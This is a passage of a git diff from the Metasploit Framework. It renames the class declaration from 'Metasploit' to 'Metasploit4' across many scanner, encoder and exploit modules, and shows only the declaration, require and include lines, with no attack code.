Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index f8f9fa0018..1333c69ff8 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index f8127748a3..15868dd886 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index f1aa17228d..ccf26867ad 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb index 9d0d933a4a..d48d7dfd8b 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index bc5d3ba6f2..a6027450f4 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index b44330f24c..bb443cf0b6 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index 32a92d5387..f950718dba 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 2756ce83fc..43a943d552 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index d760185468..34c51c9eba 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index ad2ef9bad0..c87f04e5b8 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index ae5f7ed1fb..fa77142694 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_smb_relay.rb index ca521bb97f..3c832996bf 100644 --- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb +++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index b18d9c76cf..1ae343ea5b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index 64135865da..1febb6b023 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index ac74196cfc..cd8e52f1ee 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index 15e11857ec..05bbe78ec4 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb index cb79ecae27..1658e8688d 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb index c6dfdfa751..1547c002aa 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index 9032be1236..95a48c4de8 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index 52d0d11387..f699e19db8 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb index 8214594b4a..e751c8e3cb 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb @@ -23,7 +23,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index eea01d13b5..833901c516 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 7791284890..0091f41be4 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 1647597cf4..0480f0b23d 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 466e3eb83c..5cfe258ca9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index c6566154cb..a9400633cf 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -16,7 +16,7 @@ require "msf/core" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb index e5283dd1ed..ebac99fd8b 100644 --- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb index 5cbca1ad22..6b8acd99f2 100644 --- a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/detect_kippo.rb b/modules/auxiliary/scanner/ssh/detect_kippo.rb index 1ea753e6ea..1b1371675c 100644 --- a/modules/auxiliary/scanner/ssh/detect_kippo.rb +++ b/modules/auxiliary/scanner/ssh/detect_kippo.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 358432d748..71e0077f44 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb index 0d8891f8ba..c5beadbe05 100644 --- a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb +++ b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb index 325d886922..061b3b1c10 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/auxiliary/server/tnftp_savefile.rb index 834bd1460b..26e4894234 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/auxiliary/server/tnftp_savefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report diff --git a/modules/encoders/x86/bmp_polyglot.rb b/modules/encoders/x86/bmp_polyglot.rb index b1683b1650..6c834132f4 100644 --- a/modules/encoders/x86/bmp_polyglot.rb +++ b/modules/encoders/x86/bmp_polyglot.rb @@ -177,7 +177,7 @@ class SizeCalculator end -class Metasploit < Msf::Encoder +class Metasploit4 < Msf::Encoder Rank = ManualRanking diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index d0b4e08782..18f91d7ec9 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index cfc61dd287..204bf8af5b 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb index 1213690e49..6a352d7bab 100644 --- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb +++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb index ee76fa96e0..e16a64a85c 100644 --- a/modules/exploits/freebsd/local/mmap.rb +++ b/modules/exploits/freebsd/local/mmap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb index ddb7d72ceb..aa6f165b1b 100644 --- a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb +++ b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local # It needs 3 minutes wait time # WfsDelay set to 180, so it should be a Manual exploit, # to avoid it being included in automations diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index e7bbc53312..cfc944d929 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb index 00159ae4d1..27d546f05b 100644 --- a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index a62c9a89b3..1fb8bbaf5e 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/efw_chpasswd_exec.rb b/modules/exploits/linux/http/efw_chpasswd_exec.rb index 9032a5ffec..dc3a532f2f 100644 --- a/modules/exploits/linux/http/efw_chpasswd_exec.rb +++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb index 974f8c79a7..dff154782b 100644 --- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb +++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index 740904ab45..14e5d58793 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote include Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index d9d55e4cc3..c9d90752ab 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 4277b47983..56c7f7425a 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb index 633ead5905..f325ba29ea 100644 --- a/modules/exploits/linux/local/desktop_privilege_escalation.rb +++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'base64' require 'metasm' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index cadd76474a..b6a739210f 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb index 095bb24764..b9f5606758 100644 --- a/modules/exploits/linux/local/kloxo_lxsuexec.rb +++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/pkexec.rb b/modules/exploits/linux/local/pkexec.rb index 263425193e..a4985734e7 100644 --- a/modules/exploits/linux/local/pkexec.rb +++ b/modules/exploits/linux/local/pkexec.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 5a9af7191a..9c9fb6bbe7 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb index 1bac3aa94c..655f0c719e 100644 --- a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb +++ b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/udev_netlink.rb b/modules/exploits/linux/local/udev_netlink.rb index 41e5bdd24f..e9830d13ba 100644 --- a/modules/exploits/linux/local/udev_netlink.rb +++ b/modules/exploits/linux/local/udev_netlink.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 060ce14d1d..93cb8106d5 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb index 15fa74b01f..7a00c6d689 100644 --- a/modules/exploits/linux/local/zpanel_zsudo.rb +++ b/modules/exploits/linux/local/zpanel_zsudo.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb index d3af98b03c..5ff60004ac 100644 --- a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb +++ b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index 4abf847587..cbfa6a463a 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb 